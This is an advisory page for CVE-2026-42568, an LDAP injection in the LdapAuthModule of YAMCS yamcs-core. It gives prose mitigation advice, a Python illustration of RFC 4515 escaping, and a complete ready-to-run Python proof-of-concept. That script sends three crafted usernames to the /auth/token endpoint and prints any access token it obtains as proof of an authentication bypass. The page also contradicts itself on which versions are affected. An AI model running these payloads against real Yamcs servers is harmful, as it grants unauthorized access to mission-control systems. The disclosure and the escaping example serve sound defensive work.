YAMCS yamcs-core 5.12.7 – LDAP Injection

Categories: WebApps

Overview

The YAMCS yamcs-core 5.12.7 vulnerability, identified as CVE-2026-42568, exposes systems to LDAP injection attacks. This security flaw allows attackers to manipulate LDAP queries, potentially gaining unauthorized access to sensitive information stored within the directory service.

Technical Details

LDAP injection occurs when an application incorporates unvalidated user input into an LDAP query. In YAMCS yamcs-core 5.12.7 the flaw is insufficient input sanitization in the LDAP authentication path: the supplied username is substituted into the configured search filter without escaping the characters that LDAP treats as filter metacharacters. An attacker can therefore submit a specially crafted username that alters the intended structure of the LDAP query, allowing them to bypass authentication or retrieve unauthorized data.

This manipulation can lead to various outcomes, including the exposure of user credentials, access to sensitive configuration data, or even the ability to modify directory entries. The exploit method typically involves crafting input that the application fails to validate, leading to unintended query execution.

Impact

The potential consequences of exploiting CVE-2026-42568 are severe. Successful LDAP injection attacks can result in data breaches, unauthorized access to critical systems, and the compromise of user accounts. Organizations relying on YAMCS for mission-critical operations may face operational disruptions, reputational damage, and compliance violations.

Mitigation

To protect against LDAP injection vulnerabilities, security professionals should implement robust input validation and sanitization mechanisms. All user input should be treated as untrusted, and LDAP filter metacharacters should be escaped or rejected before the value reaches a query. Additionally, building filters through the directory API's argument-substitution mechanism rather than by string replacement (the LDAP equivalent of parameterized queries) significantly reduces the risk of injection attacks.

Regular security audits and code reviews are essential to identify and remediate potential vulnerabilities in the application. Keeping YAMCS and all related software up to date with the latest security patches will also help mitigate risks associated with known vulnerabilities like CVE-2026-42568. Organizations are encouraged to monitor their systems for unusual activities that may indicate an attempted exploit.
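The unescaped replace() described in the PoC docstring, shown beside an RFC 4515 value escaper that closes the hole, as an added example in Python (not Yamcs's own Java code; function names are mine, and the page's own three usernames are used as inputs):

```python
"""RFC 4515 escaping versus raw substitution of a username into an LDAP filter.
Added illustration; not code from Yamcs or from the advisory."""

# RFC 4515 section 3: these characters must be escaped inside an assertion value.
_SPECIAL = {
    "\x00": "\\00",
    "(": "\\28",
    ")": "\\29",
    "*": "\\2a",
    "\\": "\\5c",
}


def escape_filter_value(value: str) -> str:
    """Escape a string so it can only ever be matched literally in a filter."""
    out = []
    for ch in value:
        if ch in _SPECIAL:
            out.append(_SPECIAL[ch])
        elif ord(ch) > 0x7F:
            # Non-ASCII: escape each UTF-8 byte as \XX, as RFC 4515 requires.
            out.append("".join(f"\\{b:02x}" for b in ch.encode("utf-8")))
        else:
            out.append(ch)
    return "".join(out)


def vulnerable_filter(user_filter: str, username: str) -> str:
    """Mirrors userFilter.replace("{0}", username): the pattern the advisory describes."""
    return user_filter.replace("{0}", username)


def hardened_filter(user_filter: str, username: str) -> str:
    """Same substitution, but the value is escaped first."""
    return user_filter.replace("{0}", escape_filter_value(username))


def filter_parens_balanced(ldap_filter: str) -> bool:
    """Cheap structural check: an injected value unbalances or regroups parentheses."""
    depth = 0
    for ch in ldap_filter:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return False
    return depth == 0


if __name__ == "__main__":
    for name in ("*)(uid=*))(|(uid=*", "admin)(|(objectClass=*", "op*", "jdoe"):
        print(vulnerable_filter("(uid={0})", name), "->", hardened_filter("(uid={0})", name))
```

The parenthesis check is only a sanity test for the escaper's output; it is not a substitute for escaping, since a wildcard like op* keeps the filter balanced yet still broadens the match.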

Proof of Concept (PoC)

poc.py
# Exploit Title: YAMCS yamcs-core 5.12.7 - LDAP Injection
# Date: 2026-05-27
# Exploit Author: Daniel Miranda Barcelona (Excal1bur)
# Vendor Homepage: https://yamcs.org
# Software Link: https://github.com/yamcs/yamcs
# Version: < 5.12.7
# Tested on: Linux
# CVE: CVE-2026-42568
# Category: Remote / Auth Bypass
# Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-cqh3-jg8p-336j

#!/usr/bin/env python3
"""
CVE-2026-42568 — YAMCS LDAP Injection in LdapAuthModule
=========================================================
The username parameter in LdapAuthModule is inserted directly
into LDAP search filters without RFC 4515 escaping.

Root cause (LdapAuthModule.java):
    var filter = userFilter.replace("{0}", username);

With userFilter=(uid={0}) and username=*)(uid=*))(|(uid=*
Result: (uid=*)(uid=*))(|(uid=*) — universal match, auth bypass.

Only affects instances with LdapAuthModule configured.
=========================================================
"""

import requests
import sys
import json

def main():
    target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8090"
    base = target.rstrip("/")

    print("=" * 65)
    print(" CVE-2026-42568 — YAMCS LDAP Injection PoC")
    print(f" Target: {target}")
    print(" Requires: LdapAuthModule configured in yamcs.yaml")
    print("=" * 65)

    payloads = [
        {
            "name": "Universal bypass",
            "username": "*)(uid=*))(|(uid=*",
            "password": "anything",
        },
        {
            "name": "Targeted bypass (admin)",
            "username": "admin)(|(objectClass=*",
            "password": "wrongpassword",
        },
        {
            "name": "Wildcard match",
            "username": "op*",
            "password": "anything",
        }
    ]

    for i, p in enumerate(payloads, 1):
        print(f"\n[{i}] {p['name']}")
        print(f"     username: {p['username']}")
        print(f"     password: {p['password']}")

        try:
            resp = requests.post(f"{base}/auth/token",
                data={
                    "grant_type": "password",
                    "username": p["username"],
                    "password": p["password"]
                }, timeout=5)

            print(f"     HTTP:     {resp.status_code}")

            if resp.status_code == 200:
                token = resp.json().get("access_token", "")
                print(f"     [!!!] AUTH BYPASSED")
                if token:
                    print(f"     [!!!] Token: {token[:50]}...")
            elif resp.status_code == 401:
                print(f"     [-] 401 — LDAP may not be configured")
            elif resp.status_code == 403:
                print(f"     [+] 403 — Patched or LDAP disabled")

        except requests.exceptions.ConnectionError:
            print(f"     [-] Connection refused — is YAMCS running?")
        except Exception as e:
            print(f"     [-] Error: {e}")

    print("\n" + "=" * 65)
    print(" Fix: Upgrade to yamcs-core >= 5.12.7")
    print("=" * 65)

if __name__ == "__main__":
    main()

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.